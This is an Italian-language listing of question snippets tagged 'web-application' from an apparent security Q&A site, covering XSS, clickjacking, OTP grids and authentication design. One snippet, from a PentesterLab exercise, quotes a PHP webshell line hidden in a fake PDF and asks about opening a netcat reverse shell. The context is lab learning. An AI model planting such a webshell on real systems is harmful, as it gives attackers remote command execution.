Domande con tag 'web-application'

2
risposte

Rilevamento delle intrusioni basato sul Web che integra la visibilità nell'app Web e nel database

Considerare il problema dell'indurimento di un'applicazione Web esistente, supportata da database, per rilevare gli attacchi e fermarli dove possibile. Sembra che un approccio plausibile potrebbe essere quello di costruire un sistema di rilev...
posta 04.06.2014 - 00:39
2
risposte

Ci sono dei difetti nella mia progettazione per una griglia OTP basata su carta?

Sto cercando di implementare l'autenticazione a due fattori a basso costo per un mio sito web. La mia banca utilizza questo tipo di sistema OTP basato su griglia, quindi ho voluto emularlo nella mia applicazione: Lecartevengonogenerateutilizz...
posta 09.08.2014 - 21:23
1
risposta

Che cos'è il contenuto di x-frame?

Ho provato a scansionare i siti Web per le vulnerabilità e ho scoperto che la maggior parte di essi ha un contenuto x-frame a basso rischio e "nosniff" cosa è esattamente?     
posta 20.09.2014 - 16:45
1
risposta

Impossibile connettersi alla shell inversa di netcat

Sto facendo un esercizio di PentesterLab, ho una webshell chiamata 1.pdf e può essere inclusa in index.php come file PHP. Contiene codice come questo: %PDF-1.4 <?php echo system($_GET["cmd"]); ?> Ora voglio creare una shell inversa us...
posta 09.04.2014 - 08:39
3
risposte

Questa vulnerabilità riflessa in XSS rappresenta una vera minaccia?

Ho un sito web in cui gli utenti possono inserire del testo in una casella di testo e il testo viene immediatamente visualizzato in un div utilizzando javascript (rigorosamente front-end). Se un utente termina qualcosa del genere: This is my t...
posta 11.04.2014 - 01:12
1
risposta

Quando è opportuno fornire una protezione per il clickjacking a una delle mie pagine web?

Gestisco un paio di siti Web, quindi mi chiedo quale sia l'uso appropriato della protezione per il clickjacking come l'intestazione della risposta x-frame-options? Quali pagine sono suscettibili a questo tipo di attacco ai miei utenti?     
posta 15.06.2014 - 00:39
2
risposte

Processo di autenticazione asincrono vs. sincrono

Attualmente sto sviluppando un'applicazione web usando Node.js (lato server JavaScript) e MongoDB (database NoSQL). Sono nella fase in cui devo progettare l'autenticazione e ho avuto una domanda sulla programmazione asincrona. Uno dei vant...
posta 19.06.2013 - 10:34
1
risposta

Archiviazione sicura del browser

Dove è un luogo sicuro dove archiviare un "segreto" in un browser Web a cui un utente ha accesso e JavaScript no? Il pensiero era sulla falsariga della cronologia web, i segnalibri, incorporati in Gestione password & cache. Modifica...
posta 18.08.2013 - 12:42
1
risposta

La decrittografia è più sicura di Java + JSF rispetto all'utilizzo di JavaScript?

Prima di tutto, questo è oltre all'utilizzo di SSL! Sto creando un'applicazione web che riceve dati crittografati da un server. I dati devono essere decifrati lato client. Ho letto abbastanza post qui per vedere che la sicurezza implementata con...
posta 23.07.2013 - 14:13
2
risposte

Esegui comandi cmd con attacco di attraversamento della directory http

Riepilogo domande: Sto cercando di creare uno scenario di laboratorio in cui "l'attaccante" è destinato a eseguire un attacco trasversale di directory da una pagina HTML e spostarsi nelle directory di sistema di Windows. Posso iniettare com...
posta 05.06.2015 - 17:14